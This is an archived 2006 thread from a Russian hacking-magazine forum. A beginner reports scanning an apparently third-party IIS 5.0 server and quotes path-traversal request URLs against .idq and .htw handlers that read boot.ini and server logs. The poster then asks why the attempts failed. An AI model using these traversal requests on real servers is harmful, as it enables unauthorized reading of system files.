Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

[Проблема] Уязвимость *.ida; *.idq; *.htw

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> [Проблема] Уязвимость *.ida; *.idq; *.htw
Имя
Сообщение << Старые топики   Новые топики >>
[Проблема] Уязвимость *.ida; *.idq; *.htw - 2006-04-17 18:09:24   
De}{is

Сообщений: 137
Оценки: 0
Присоединился: 2005-11-22 11:21:42
 Недавно сканил один сервак на CGI-уязвимости и получил такой отчет:

www.balabla.ru/notexist.htw - [ 200 SUCCESS ]
www.balabla.ru/notexist.ida - [ 200 SUCCESS ]
www.balabla.ru/notexist.idq - [ 200 SUCCESS ]
www.balabla.ru/prxdocs/misc/prxrch.idq - [ 200 SUCCESS ]

Пошарил по сети и везде пишут, что при наличии данных файлов на серваке (в моем случаи IIS v5.0) можно просматривать любые файлы:

http://www.victim.com/blabla.idq?CiTemplate=../../../boot.ini

http://www.server.com/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile= /../../winnt/system32/logfiles/w3svc1/ex000127.log&CiRestriction=none&CiHiliteType=Full

Но в первом случаии я получаю в ответ:

Le fichier IDQ notexist.idq n''a pas pu &#234;tre trouv&#233;.

А во втором:

Le chemin sp&#233;cifi&#233; n''est pas correct.

(кажися по французски)

Значит ли это, что севак пропатчен или я то-то не так делаю???
Post #: 1
[Проблема] Уязвимость *.ida; *.idq; *.htw - 2006-04-20 17:08:39   
goldy

Сообщений: 31
Оценки: 0
Присоединился: 2006-01-26 16:25:37
 www.translate.ru
переводи
Post #: 2
Страниц:  [1]
Все форумы >> [Для начинающих] >> [Проблема] Уязвимость *.ida; *.idq; *.htw







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.